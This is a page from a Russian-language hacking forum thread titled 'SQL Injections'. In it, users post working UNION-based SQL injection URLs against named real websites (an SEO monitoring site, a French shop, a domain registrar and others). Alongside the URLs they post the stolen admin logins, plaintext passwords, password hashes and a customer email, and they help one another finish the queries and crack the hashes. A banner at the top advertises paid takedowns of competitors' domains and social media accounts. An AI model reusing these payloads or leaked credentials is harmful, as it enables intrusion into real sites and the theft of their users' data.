SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
SQL Инъекции

Страница 725 из 1604

725

Опции темы

Поиск в этой теме

Опции просмотра

#7241

30.12.2008, 00:44

-m0rgan-

Постоянный

Регистрация: 29.09.2008

Сообщений: 553

С нами: 9270510

Репутация: 519

jokester, сорри)
Исправляемся:
Сйт представляет услугу мониторинга seo-параметров, таких как
Индекс цетирования Yandex тИЦ
Индекс Google PageRank
Количество проиндексированных страниц в Yandex

Код:

http://www.seo-mon.com/news.php?id=-1+union+select+1,2,concat_ws(0x3a,user_id,nikname,lastname,firstname,secondname,email,login,password,register_time,status,type,register_id),4,5,6+from+users--

Логин/пасс:

Код:

tigranav:8791109100

--------------------------------------------------
The End!

#7242

30.12.2008, 01:37

ElteRUS

Постоянный

Регистрация: 11.10.2007

Сообщений: 406

С нами: 9780227

Репутация: 1423

purple.fr магазинчик

http://www.purple.fr/fashion.php?c=-7+union+select+1,concat_ws(0x2f,version(),database (),user())/*

5.0.32-Debian_7etch8-log/purple/purple@localhost

http://www.purple.fr/fashion.php?c=-7+union+select+1,group_concat(concat_ws(0x2f,login ,passwd))+from+user/*

root/6teutd7UL7NG.

http://www.purple.fr/fashion.php?c=-7+union+select+1,concat_ws(0x2f,email,passwd)+from +customer+limit+4200,1/*

felipe_e@hotmail.com/19l0ZUzMeK.b.

#7243

30.12.2008, 01:42

Gemini12

Познающий

Регистрация: 24.12.2008

Сообщений: 54

С нами: 9147012

Репутация: 9

Код:

http://forparentssake.com/index.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,username,password),7,8+from+users--

aDMin:03110WoodBury

#7244

30.12.2008, 01:43

-m0rgan-

Постоянный

Регистрация: 29.09.2008

Сообщений: 553

С нами: 9270510

Репутация: 519

Вот кароче что я обкуренный нафигачил:

Код:

http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(table_name))),3,4,5+from+information_schema.tables--

Из таблицы tbladmins:

Код:

http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(table_name))),3,4,5+from+information_schema.tables--

А вот составить финальный запрос не получилось, как я токо не шифровал...((((

Кароче кто сможет, отпишитесь ниже(!!!), будем все домены на халяву регать=))))
------------------------------------------------------------
The End!

#7245

30.12.2008, 02:01

Red_Red1

Участник форума

Регистрация: 12.01.2007

Сообщений: 262

С нами: 10172486

Репутация: 874

http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(concat(use rname,0x3A,password)))),3,4,5+from+naira_clients.t bladmins--
За group_concat - спасибо, незнал.

#7246

30.12.2008, 02:02

ElteRUS

Постоянный

Регистрация: 11.10.2007

Сообщений: 406

С нами: 9780227

Репутация: 1423

-m0rgan-, а финальный - это какой ?)

http://www.nairadomains.com/news.php?id=-1+union+select+1,concat_ws(0x2F,username,password) ,3,4,5+from+naira_clients.tbladmins

ADMIN/E7AA807F2B59DE7B73495FF59B30EC26

опередили, потрите плз )

#7247

30.12.2008, 02:04

masternet

Участник форума

Регистрация: 18.05.2008

Сообщений: 130

С нами: 9463474

Репутация: 155

Цитата:

Сообщение от -m0rgan-

Вот кароче что я обкуренный нафигачил:

Код:

http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(table_name))),3,4,5+from+information_schema.tables--

Из таблицы tbladmins:

Код:

http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(table_name))),3,4,5+from+information_schema.tables--

http://www.nairadomains.com/news.php?id=-1+union+select+1,concat_ws(char(32,45,32),username ,password),3,4,5+from+naira_clients.tbladmins--
элементарно,ватсон!
расшифруете хеш пмните мне)))

#7248

30.12.2008, 02:19

Gemini12

Познающий

Регистрация: 24.12.2008

Сообщений: 54

С нами: 9147012

Репутация: 9

А мне он выдал

http://www.nairadomains.com/news.php?id=-1+union+select+1,concat_ws(0x3a,name,password),3,4 ,5+from+admins--

master:master

тока в админку не пускает (